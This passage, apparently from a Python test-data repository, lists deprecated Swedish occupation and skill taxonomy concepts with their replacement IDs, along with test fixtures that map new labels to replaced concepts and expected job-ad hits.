'taxonomy/definition': 'Flygledarassistent', 'taxonomy/preferred-label': 'Flygledarassistent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'WUxP_1ih_6RG', 'taxonomy/definition': 'Flight Data Operator/FDO/Flygledarassistent',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Flight Data Operator/FDO/Flygledarassistent'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Uoeq_F5q_18w', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kanslichef/verksamhetschef, församling',
'taxonomy/preferred-label': 'Kanslichef/verksamhetschef, församling',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'V74g_m5Z_BtM', 'taxonomy/definition': 'Kanslichef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kanslichef'}]}, 'taxonomy/version': 2}
]
change_v1_to_v2_skill = [
{'taxonomy/concept': {'taxonomy/id': 'zDPA_vcC_GqY', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Kognitiv terapi', 'taxonomy/preferred-label': 'Kognitiv terapi',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'bhp9_3YQ_YMH', 'taxonomy/definition': 'Kognitiv psykoterapi', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Kognitiv psykoterapi'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'omTo_PiA_RX6', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Psykodynamisk inriktning',
'taxonomy/preferred-label': 'Psykodynamisk inriktning', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'ZnGd_a1m_2Fi', 'taxonomy/definition': 'Psykodynamisk psykoterapi',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'Psykodynamisk psykoterapi'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'dcYP_eMq_xNY', 'taxonomy/type': 'skill',
'taxonomy/definition': 'BB2 (vissa enkla elinstallationer)',
'taxonomy/preferred-label': 'BB2 (vissa enkla elinstallationer)', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '4mNF_7vZ_vCx', 'taxonomy/definition': 'B - Begränsad auktorisation',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'B - Begränsad auktorisation'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '2nAr_Bhe_vda', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Sidmontering', 'taxonomy/preferred-label': 'Sidmontering',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '16sV_pbX_iED', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Textbearbetning', 'taxonomy/preferred-label': 'Textbearbetning',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'fUzi_DwE_dMu', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Kopparsticksgravyr', 'taxonomy/preferred-label': 'Kopparsticksgravyr',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'fvXQ_LWU_T8z', 'taxonomy/type': 'skill', 'taxonomy/definition': 'Kartgravyr',
'taxonomy/preferred-label': 'Kartgravyr', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'Prepressarbete'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'NBXw_2xF_89L', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Stålsticksgravyr', 'taxonomy/preferred-label': 'Stålsticksgravyr',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '2X76_itb_csw', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Originalmontering', 'taxonomy/preferred-label': 'Originalmontering',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'EQQL_1YJ_JVX', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Textsättning', 'taxonomy/preferred-label': 'Textsättning',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'UW8w_CQg_a9V', 'taxonomy/type': 'skill',
'taxonomy/definition': '4-färgsseparering', 'taxonomy/preferred-label': '4-färgsseparering',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'EL4A_hSn_JYx', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Estetiska programmet/Musik, undervisning',
'taxonomy/preferred-label': 'Estetiska programmet/Musik, undervisning',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'HUBG_Mz2_X1G', 'taxonomy/definition': 'Estetiska programmet, undervisning',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'Estetiska programmet, undervisning'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AbDo_gbm_f46', 'taxonomy/type': 'skill', 'taxonomy/definition': 'CAD-ritning',
'taxonomy/preferred-label': 'CAD-ritning', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'oaiv_GsB_AFK', 'taxonomy/definition': 'CAD-konstruktion/CAD-ritning',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'CAD-konstruktion/CAD-ritning'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'QU9n_VJq_kYo', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Motorsport/sport', 'taxonomy/preferred-label': 'Motorsport/sport',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '5AdH_yyr_MPW', 'taxonomy/definition': 'Sportjournalistik', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Sportjournalistik'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'vHbJ_BUC_xDW', 'taxonomy/type': 'skill', 'taxonomy/definition': 'Mode/design',
'taxonomy/preferred-label': 'Mode/design', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'LyVp_zhc_czS', 'taxonomy/definition': 'Modejournalistik',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'Modejournalistik'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'SENm_xRv_P3b', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Spabehandlingar', 'taxonomy/preferred-label': 'Spabehandlingar',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'vHaL_11u_eEi', 'taxonomy/definition': 'Spabehandling', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Spabehandling'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1iPF_7Cg_zUm', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Mästarbrev, konstbrodör',
'taxonomy/preferred-label': 'Mästarbrev, konstbrodör', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'TJ8G_gZg_5tL', 'taxonomy/definition': 'Mästarbrev, broderi/konstbroderi',
'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Mästarbrev, broderi/konstbroderi'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'QGSv_ngN_iA9', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Gesällbrev, konstbrodör',
'taxonomy/preferred-label': 'Gesällbrev, konstbrodör', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'EmPd_sYg_gz3', 'taxonomy/definition': 'Gesällbrev, broderi/konstbroderi',
'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Gesällbrev, broderi/konstbroderi'}]},
'taxonomy/version': 2},
]
```
#### File: concept_ids/taxonomy_replace/test_data_with_expected_hits.py
```python
def get_test_data_with_expected_hits(list_of_test_data):
tmp = []
for item in list_of_test_data:
if item['hits']:
tmp.append(item)
return tmp
def get_occupations_with_expected_hits():
return get_test_data_with_expected_hits(test_data_occupation)
def get_skills_with_expected_hits():
return get_test_data_with_expected_hits(test_data_skills)
test_data_occupation = [{'new_label': 'Veterinär', 'replaced_by': 'GgmE_SvH_mtm', 'old_replaced': ['e885_ehx_zxp'],
'hits': ['24622052', '24612672']},
{'new_label': 'Artistagent/Artistbokare/Artistförmedlare', 'replaced_by': '2LBV_CoV_iEf',
'old_replaced': ['dunj_FU3_Fx5', 'GUHc_KyJ_Dst'], 'hits': []},
{'new_label': 'Försäkringshandläggare, försäkringskassa', 'replaced_by': '2AGe_heZ_E94',
'old_replaced': ['FoCc_qZ4_Yi8'], 'hits': []},
{'new_label': 'Utvecklingsingenjör, elkraft', 'replaced_by': 'YcvM_Gqk_6U7',
'old_replaced': ['Jx4V_6tm_fUH'], 'hits': ['24647561', '24645432', '24615762', '24504276']},
{'new_label': 'Vapentekniker', 'replaced_by': 'KiD2_B8H_U7U',
'old_replaced': ['XN3S_vj8_8Wz', '4Ujg_KC9_cLT'], 'hits': []},
{'new_label': 'Montör, gummi- och plastprodukter', 'replaced_by': 'efyx_6es_7jQ',
'old_replaced': ['JKDm_nyA_8bK'], 'hits': ['24648645', '24641319', '24638460', '24635077']},
{'new_label': 'Koordinator: kultur, media, film, dataspel', 'replaced_by': 'SV22_7W1_pFT',
'old_replaced': ['WAH4_sSf_GyE', 'wniw_g2F_JNQ', 'YmFo_cvw_1Kv', 'dnxZ_Bvb_S9C'],
'hits': ['24674944', '24641084']},
{'new_label': 'B - Begränsad auktorisation', 'replaced_by': '4mNF_7vZ_vCx',
'old_replaced': ['dcYP_eMq_xNY'], 'hits': []},
{'new_label': 'Löneadministratör/Lönekonsult', 'replaced_by': 'nRLP_eqC_ow9',
'old_replaced': ['GGA1_QkE_XgN', 'R33K_7kd_PPT'],
'hits': ['24649915', '24624230', '24619974']},
{'new_label': 'F&B Manager/Food and beverage manager', 'replaced_by': 'Bfn9_6FK_iaY',
'old_replaced': ['RhoN_Vdo_F5H'], 'hits': ['24649158']},
{'new_label': 'Assessor', 'replaced_by': 'U9AU_Rre_pbM', 'old_replaced': ['qic5_pQo_xhT'],
'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['2nAr_Bhe_vda', '16sV_pbX_iED', 'fUzi_DwE_dMu', 'fvXQ_LWU_T8z',
'NBXw_2xF_89L',
'2X76_itb_csw', 'EQQL_1YJ_JVX', 'UW8w_CQg_a9V'], 'hits': []},
{'new_label': 'Kurator', 'replaced_by': 'YpRs_ybt_47a',
'old_replaced': ['L8Hw_5mJ_zic', 'Y86G_M6o_9R8'],
'hits': ['24640701', '24633665', '24626839', '24543668', '24437169']},
{'new_label': 'Elektriker, film/Elektriker, TV', 'replaced_by': 'UtA2_od9_3WT',
'old_replaced': ['X4cv_VTi_Muz'], 'hits': []},
{'new_label': 'Redaktör', 'replaced_by': 'GFu2_s4q_9sr', 'old_replaced': ['LCCW_oaP_6kn'],
'hits': []},
{'new_label': 'HR-chef', 'replaced_by': 'y22E_Nz6_5VU',
'old_replaced': ['79uB_oJR_dSQ', 'nSdx_qDe_vCh'],
'hits': ['24647998', '24623695', '24566659', '24442113']},
{'new_label': 'Elkvalitetsanalytiker, elkraft', 'replaced_by': 'p4vQ_Dpo_d6a',
'old_replaced': ['XZrs_VW9_31C'], 'hits': []},
{'new_label': 'Annonsassistent/Annonssekreterare', 'replaced_by': 'MegR_77J_CGU',
'old_replaced': ['YrxV_b6A_Dav'], 'hits': []},
{'new_label': 'Kognitiv psykoterapi', 'replaced_by': 'bhp9_3YQ_YMH',
'old_replaced': ['zDPA_vcC_GqY'],
'hits': []},
{'new_label': 'Teknisk chef, kommun', 'replaced_by': 'iJfW_Lt2_sQt',
'old_replaced': ['SpMJ_sSm_Vjp'],
'hits': []},
{'new_label': 'Internatföreståndare/Skolmåltidsföreståndare', 'replaced_by': 'VKcv_Mbu_KJE',
'old_replaced': ['jNaB_ozm_pm7'], 'hits': []},
{'new_label': 'Sångare', 'replaced_by': 'k3ZW_16R_riY',
'old_replaced': ['VtTs_Y26_KMJ', '7rkC_Rot_tat'],
'hits': []},
{'new_label': 'Redovisningskonsult', 'replaced_by': 'CeoS_Wzo_uz5',
'old_replaced': ['ayC6_Lks_sFQ', 'i5JT_We2_TpX', 'Ffsi_TDN_PDF', 'HeRm_ChB_HVB'],
'hits': ['24640665', '24635281', '24619295', '24618922', '24596487', '24595573', '24578086',
'24565035',
'24553781', '24541494']},
{'new_label': 'Butikskommunikatör/Visual merchandiser', 'replaced_by': 'GTFy_iPM_msj',
'old_replaced': ['JGxJ_pEB_yre'], 'hits': []},
{'new_label': 'Fartygsagent/Fartygsklarerare', 'replaced_by': 'eXwZ_gVJ_39q',
'old_replaced': ['ybqj_FXq_K98'], 'hits': []},
{'new_label': 'Dansare', 'replaced_by': 'euJP_wxo_skF', 'old_replaced': ['saUi_aP6_zhU'],
'hits': []},
{'new_label': 'Skolchef/Skoldirektör/Skolledare', 'replaced_by': 'j6P1_gJq_a2Q',
'old_replaced': ['zHkF_Yg1_PTS', 'MopY_AvK_MmE'], 'hits': ['24575721', '24569099']},
{'new_label': 'Nationalekonom', 'replaced_by': 'ef1m_sEu_ok6', 'old_replaced': ['Cq7H_YYS_aQH'],
'hits': ['24606305']},
{'new_label': 'Forskare, jordbruk', 'replaced_by': 'oRBx_v9Q_vH2',
'old_replaced': ['cCYi_JUn_K8P'],
'hits': []},
{'new_label': 'Elkraftingenjör', 'replaced_by': '7Yn2_NLJ_oa2',
'old_replaced': ['1hZc_5BC_K7q', 'g7UK_FUb_nxf', 'PMx8_n1G_fPx', 'Eo4y_EGW_KVM',
'aWNX_iEg_NhN',
'Kh3N_Kg8_KK5'],
'hits': ['24645107', '24602558', '24572890', '24512446', '24507851', '24445999']},
{'new_label': 'Parkeringsvakt/Trafikövervakare', 'replaced_by': 'rfpp_bnQ_RoQ',
'old_replaced': ['44uM_XPP_VdK'], 'hits': []},
{'new_label': 'Butikschef', 'replaced_by': 'WWVG_4sM_faC', 'old_replaced': ['yjaM_pAe_u9m'],
'hits': ['24644601', '24639242', '24636959', '24632618', '24627262', '24625609', '24611376',
'24607526',
'24605640', '24594836']},
{'new_label': 'Abonnemangsförsäljare', 'replaced_by': 'aoUt_f9s_rAk',
'old_replaced': ['4xEL_DVf_rNV'],
'hits': ['24648147', '24648032', '24647914', '24647866', '24645321', '24645317', '24643210',
'24643150',
'24643147', '24639915']},
{'new_label': 'Tågvärd/Tågvärdinna', 'replaced_by': 'KMRG_Bda_5CV',
'old_replaced': ['tnaT_rPT_RXj'],
'hits': []},
{'new_label': 'Modejournalistik', 'replaced_by': 'LyVp_zhc_czS',
'old_replaced': ['vHbJ_BUC_xDW'],
'hits': []},
{'new_label': 'Mästarbrev, broderi/konstbroderi', 'replaced_by': 'TJ8G_gZg_5tL',
'old_replaced': ['1iPF_7Cg_zUm'], 'hits': []},
{'new_label': 'Demograf', 'replaced_by': 'GX5o_8RD_rxJ', 'old_replaced': ['D7tB_NxQ_ZWN'],
'hits': []},
{'new_label': 'Prepressoperatör', 'replaced_by': 'gUu8_FXb_qCv',
'old_replaced': ['CWK4_8NM_4YY', 'mL3G_SKE_mab'], 'hits': []},
{'new_label': 'TV-fotograf', 'replaced_by': 'JfyC_gDr_U4e', 'old_replaced': ['E9Fm_7C2_uYU'],
'hits': []},
{'new_label': 'Musiker', 'replaced_by': 'UCXb_LjK_pHv',
'old_replaced': ['7fB3_Ckh_NuC', 'aR3a_5Ly_TDw'],
'hits': ['24531845']},
{'new_label': 'Familjerättssekreterare', 'replaced_by': 'dBVw_5Cw_upG',
'old_replaced': ['KgMS_ENm_V7z'],
'hits': []},
{'new_label': 'Laboratoriebiträde', 'replaced_by': 'sghA_68W_sYw',
'old_replaced': ['Hv4J_UHc_s7M', 'Ttbo_P3H_C4V', 'AWpr_8U2_32J'], 'hits': []},
{'new_label': 'Forskare, trädgårdsvetenskap', 'replaced_by': 'Co7T_yKa_Zb1',
'old_replaced': ['5bp9_eBL_BPF'], 'hits': []},
{'new_label': 'Revisorsassistent', 'replaced_by': 'Bbpr_AMz_nzt',
'old_replaced': ['7rct_y2Q_NSe'],
'hits': ['24612654', '24591386', '24549608']},
{'new_label': 'Forskare, språk', 'replaced_by': 'WrM5_fTS_37j',
'old_replaced': ['DCMR_H5T_4Nk'],
'hits': []},
{'new_label': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör',
'replaced_by': 'QUmN_cfC_zPn',
'old_replaced': ['sbKP_NHi_eiv', 'JPtk_3q6_xBL', '1jLm_pkS_3BX'],
'hits': ['24649356', '24647010']},
{'new_label': 'Helpdesktekniker/Supporttekniker', 'replaced_by': 'KQty_E1u_cia',
'old_replaced': ['4zNH_ukk_cEn'],
'hits': ['24647864', '24645367', '24642579', '24641101', '24639693', '24638483', '24636316',
'24636297',
'24634219', '24632405']},
{'new_label': 'Kommunchef/Kommundirektör/Stadsdirektör', 'replaced_by': 'dRXp_E2C_Lq9',
'old_replaced': ['fdZE_y62_wdE', '7yzW_dCg_7s7'], 'hits': ['24648307']},
{'new_label': 'Mediatextare', 'replaced_by': 'S2QW_12u_Pj1',
'old_replaced': ['RSra_C73_mJe', 'HcpH_1h7_vkK', 'PM4A_xoG_hQD'], 'hits': []},
{'new_label': 'Ekonomichef', 'replaced_by': 'iCy6_G72_abh', 'old_replaced': ['nHFx_RFe_giS'],
'hits': ['24650582', '24625929', '24624351', '24616138', '24615771', '24610880']},
{'new_label': 'Stadsbyggnadschef/Stadsbyggnadsdirektör', 'replaced_by': 'DWv2_Yu9_yo6',
'old_replaced': ['noSX_WNd_Nxv'], 'hits': []},
{'new_label': 'Fastighetschef/Fastighetsdirektör', 'replaced_by': 'wUKi_LRW_Wxk',
'old_replaced': ['7J2i_94b_ow4'], 'hits': ['24643005', '24632701', '24596320']},
{'new_label': 'Estetiska programmet, undervisning', 'replaced_by': 'HUBG_Mz2_X1G',
'old_replaced': ['EL4A_hSn_JYx'], 'hits': []},
{'new_label': 'Annonsmottagare', 'replaced_by': 'p3m5_Ndd_6im',
'old_replaced': ['7Zx9_BVE_Qna', 'zKqM_a5a_29j'], 'hits': []},
{'new_label': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare',
'replaced_by': 'ATAp_LN5_BPU',
'old_replaced': ['VCsj_Uve_6EJ', 'sqJi_voF_eaR', 'aCbh_uAN_6th'],
'hits': ['24647491']},
{'new_label': 'Inspicient', 'replaced_by': 'Zjz2_R2c_ySs',
'old_replaced': ['Sdc8_zgb_WFe', 'NBpU_vTR_B6S'], 'hits': []},
{'new_label': 'Badföreståndare/Simhallsföreståndare', 'replaced_by': 'q6mQ_fnc_A9Y',
'old_replaced': ['gE2Y_BMR_Dpq'], 'hits': []},
{'new_label': 'Miljöingenjör/Miljövårdsingenjör', 'replaced_by': 'vUZt_BHY_mk2',
'old_replaced': ['MLPW_mLu_d7K'], 'hits': ['24643524']},
{'new_label': 'Idrottskonsulent', 'replaced_by': 'M7TY_sct_XPk',
'old_replaced': ['hJuL_n8p_UEM'],
'hits': ['24641526']},
{'new_label': 'Underhållsanalytiker, elkraft', 'replaced_by': 'Yyn9_wQV_Wb8',
'old_replaced': ['4QjK_RpG_h4w'], 'hits': ['24637940', '24509354']},
{'new_label': 'Civilingenjör, elkraft', 'replaced_by': 'FuJx_cGT_5im',
'old_replaced': ['P2bU_f8o_Lkw', 'v5nC_xX1_Y7U', 'D3M6_p8P_jdD', '4i7D_pQL_DNa',
'WhsT_BWb_dPy',
'GtGP_PiD_yRc'], 'hits': ['24632281', '24622759', '24573532']},
{'new_label': 'Förhandlingschef', 'replaced_by': 'JZgY_jHa_Uwa',
'old_replaced': ['1oCZ_J6h_rGV'],
'hits': []},
{'new_label': 'Dataregistrerare/Registrerare', 'replaced_by': 'jqVE_Ux3_VMN',
'old_replaced': ['nrya_iNN_6BR'], 'hits': []},
{'new_label': 'Originalare/Final Art', 'replaced_by': 'SxqC_BSK_D3u',
'old_replaced': ['AfoB_XP5_5Ak'],
'hits': []},
{'new_label': 'Beredskapsdirektör', 'replaced_by': 'cB4Q_Cx9_2Lw',
'old_replaced': ['ohrC_dLP_3ad'],
'hits': []},
{'new_label': 'Stadsjurist/Kommunjurist/Stadsadvokat', 'replaced_by': 'iRUx_bBB_Vmp',
'old_replaced': ['kZAz_CaQ_zhN', 'Cbq1_SZq_WQJ'], 'hits': []},
{'new_label': 'Komminister', 'replaced_by': 'jQKk_Wzd_pvu', 'old_replaced': ['memm_eLn_j1a'],
'hits': []},
{'new_label': 'Kvalitetssamordnare/Kvalitetskoordinator', 'replaced_by': 'hQtr_vwy_MGb',
'old_replaced': ['d2gz_es2_pX5'],
'hits': ['24647020', '24646953', '24646081', '24643688', '24640405', '24634573', '24616132',
'24610804',
'24576129', '24514986']},
{'new_label': 'Producent: kultur, media, film, dataspel', 'replaced_by': 'FcaP_vhz_Cuy',
'old_replaced': ['qV9q_oKv_QzL', 'Jsct_XQW_U8u', '5GaR_6HQ_8vY', 'XSoL_LLU_PYV',
'wiGD_eu2_UJV'],
'hits': ['24625448', '24499240']},
{'new_label': 'Spabehandling', 'replaced_by': 'vHaL_11u_eEi', 'old_replaced': ['SENm_xRv_P3b'],
'hits': []},
{'new_label': 'Invandrarkonsulent', 'replaced_by': '7yB4_npo_55m',
'old_replaced': ['X4vv_yJ8_Nx1'],
'hits': []},
{'new_label': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker',
'replaced_by': 's9UN_r5w_c5K',
'old_replaced': ['cUKA_xwQ_VWk', 'AJSy_PSb_tLY'], 'hits': []},
{'new_label': 'Verkställande direktör/VD', 'replaced_by': 'nvUH_JLD_s4F',
'old_replaced': ['dh7h_HbH_Cus'],
'hits': ['24638242', '24516982']},
{'new_label': 'Ombudsman', 'replaced_by': '7YVF_kE4_aPm',
'old_replaced': ['etPa_VHn_mrt', 'YHB5_wmX_UCt', '33CY_8xp_U24', '4pdy_hXe_krp',
'Qf5a_Awb_Xr1',
'6qFX_Cmu_o5U', 'nr69_xvF_c4f'],
'hits': ['24681267', '24681265', '24681247', '24676773', '24625395']},
{'new_label': 'Databasadministratör', 'replaced_by': 'y763_SQh_71J',
'old_replaced': ['4L63_HPx_7uh'],
'hits': ['24635989', '24632433']},
{'new_label': 'Medicinteknisk ingenjör', 'replaced_by': 'nGhq_Pjm_az5',
'old_replaced': ['NNtF_PrM_erv', 'UFCb_3sj_MET'],
'hits': ['24615799', '24608421', '24591934', '24434389']},
{'new_label': 'Linjeagent/Rederiagent', 'replaced_by': 'zthE_Zb1_tjb',
'old_replaced': ['7oc6_8Rs_fAv'],
'hits': []},
{'new_label': 'Interaktionsdesigner', 'replaced_by': 'QQjZ_NAN_bDR',
'old_replaced': ['MGBV_LVk_AtK', 'HciA_Cu7_FXt'],
'hits': ['24647065', '24646521', '24646322', '24632584', '24520622', '24527159', '24527152']},
{'new_label': 'Showartist', 'replaced_by': 'RsYS_Mkj_kd1', 'old_replaced': ['46tq_qty_Lqm'],
'hits': []},
{'new_label': 'Bostadsförmedlare', 'replaced_by': 'WL4K_4RF_NEJ',
'old_replaced': ['ssNi_aPV_7o3'],
'hits': []},
{'new_label': 'Dietist', 'replaced_by': 'C1FR_RzT_hzP',
'old_replaced': ['Zkke_bJ1_Edq', 'pp29_K2N_aDY'],
'hits': ['24641238', '24641268', '24626434', '24614914', '24581751']},
{'new_label': 'Familjebehandlare/Familjepedagog', 'replaced_by': 'Fr7W_Yjv_3ik',
'old_replaced': ['TChs_6ci_gJQ'], 'hits': ['24573516']},
{'new_label': 'Psykodynamisk psykoterapi', 'replaced_by': 'ZnGd_a1m_2Fi',
'old_replaced': ['omTo_PiA_RX6'],
'hits': []},
{'new_label': 'Administratör/Administrativ assistent', 'replaced_by': 's5pR_WNm_R8W',
'old_replaced': ['T9MX_dmQ_t5n', 'Dgx7_yw6_CaN', 'tNy7_bJc_8FS', 'GiV1_hMx_qUT'],
'hits': ['24650971', '24650060', '24647704', '24647256', '24646256', '24645598', '24642483',
'24641459',
'24636981', '24636522']},
{'new_label': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare',
'replaced_by': 'W8Kb_rxf_uRQ',
'old_replaced': ['t4QA_LXF_Z3T', '2YDV_mGq_LpN', 'ZyDH_2Xe_bfK'],
'hits': ['24647760', '24647703', '24635648', '24620172', '24619248']},
{'new_label': 'Gesällbrev, broderi/konstbroderi', 'replaced_by': 'EmPd_sYg_gz3',
'old_replaced': ['QGSv_ngN_iA9'], 'hits': []},
{'new_label': 'Bildingenjör/BING, film/BING, TV', 'replaced_by': 'm8ED_BbT_twk',
'old_replaced': ['t2pX_4bB_xCG'], 'hits': []},
{'new_label': 'Sjuksköterska, geriatrik/Sjuksköterska, äldreomsorg och äldrevård',
'replaced_by': 'uaJs_9YA_Cnp', 'old_replaced': ['kHno_7rL_Lcm'],
'hits': ['24646122', '24646015', '24643631', '24641581', '24637517', '24633039', '24619737',
'24610664',
'24607356', '24605037']},
{'new_label': 'Försäljningsassistent/Försäljningssekreterare', 'replaced_by': 'HFuj_YCt_Ymn',
'old_replaced': ['mXSF_yMY_ppH', 'NikA_KEh_Ky4', 'AfxM_9dB_xbC'],
'hits': ['24649654', '24647299', '24643212', '24603457']},
{'new_label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'replaced_by': 'BbNn_Gtf_rKp',
'old_replaced': ['kf7K_UAZ_ed8', 'YXm8_rp9_1Sv', 'wFPP_zmg_PK4', 'qtPc_BJB_SYL'],
'hits': ['24645272', '24572488', '24552904']},
{'new_label': 'Kontrollanläggningsingenjör, elkraft', 'replaced_by': 'fYBk_dfW_DJc',
'old_replaced': ['Be1K_Dp4_DrD'], 'hits': []},
{'new_label': 'Tandtekniker', 'replaced_by': '9fEz_9ji_74Y', 'old_replaced': ['EEN6_NCm_XgJ'],
'hits': ['24553091']},
{'new_label': 'Reklamassistent/Reklamsekreterare', 'replaced_by': 'XYoM_UCq_923',
'old_replaced': ['7jaj_Pej_27m'], 'hits': []},
{'new_label': 'Kanslichef', 'replaced_by': 'V74g_m5Z_BtM',
'old_replaced': ['2DB2_o9K_sMy', 'KhbC_P4c_R82', 'Uoeq_F5q_18w'], 'hits': ['24646965']},
{'new_label': 'Kontrollanläggningstekniker', 'replaced_by': 'iXyv_E2W_cqc',
'old_replaced': ['TppD_R5Y_kiG', 'cJ62_FKk_ua6'],
'hits': ['24641497', '24623380', '24623314']},
{'new_label': 'Flight Data Operator/FDO/Flygledarassistent', 'replaced_by': 'WUxP_1ih_6RG',
'old_replaced': ['UjqL_rhp_jC4'], 'hits': []},
{'new_label': 'CAD-konstruktion/CAD-ritning', 'replaced_by': 'oaiv_GsB_AFK',
'old_replaced': ['AbDo_gbm_f46'], 'hits': []},
{'new_label': 'Trafiklärare', 'replaced_by': 'hERw_LKk_uJK', 'old_replaced': ['3vQv_E4Q_wjK'],
'hits': ['24648390', '24604479', '24618870', '24603183', '24596067', '24585890', '24534821',
'24478339']},
{'new_label': 'Sportjournalistik', 'replaced_by': '5AdH_yyr_MPW',
'old_replaced': ['QU9n_VJq_kYo'],
'hits': []},
{'new_label': 'HR-assistent', 'replaced_by': 'ofiS_5F2_YmV',
'old_replaced': ['1reZ_8Q1_nwY', '1zns_dXR_NMQ', '9wyj_ibD_Yo1'],
'hits': ['24646439', '24643526', '24617892']},
{'new_label': 'Redigerare, rörlig bild', 'replaced_by': 'K1k3_ZHN_PTh',
'old_replaced': ['7pvW_ATp_bnx', 'N9fQ_uJ4_1vB'], 'hits': []},
{'new_label': 'Arbetsledare, städ/Husfru/Städledare', 'replaced_by': 'cYP6_Tur_q6m',
'old_replaced': ['Yx7u_AbE_Jqk'], 'hits': ['24648781', '24638880', '24633176']},
{'new_label': 'Revisor', 'replaced_by': 'jwgi_jYc_iE9',
